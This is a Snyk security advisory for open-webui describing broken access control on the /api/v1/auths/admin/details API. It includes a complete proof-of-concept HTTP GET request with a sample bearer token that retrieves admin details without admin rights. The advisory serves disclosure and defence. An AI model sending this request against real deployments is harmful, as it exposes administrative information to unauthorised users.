Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsThere is no fixed version for open-webui
.
open-webui is an Open WebUI
Affected versions of this package are vulnerable to Undefined Behavior for Input to API due to improper access control on the /api/v1/auths/admin/details
interface. An attacker can view administrative details by directly calling the interface without needing administrative privileges.
Note:
This is only exploitable if the attacker has network access to the application's API.
GET /api/v1/auths/admin/details HTTP/1.1
Host: localhost:8090
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
Content-Type: application/json
sec-ch-ua-mobile: ?0
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImYxYWE3YTE4LTYxN2UtNGViOC05ZWE4LWYwYjQ2NTMzYzE0ZiJ9.Wrvss1VJkvwdiS4N8C9UBo17jmsY-3wjynuFoMNrMP8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8090/admin/settings/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close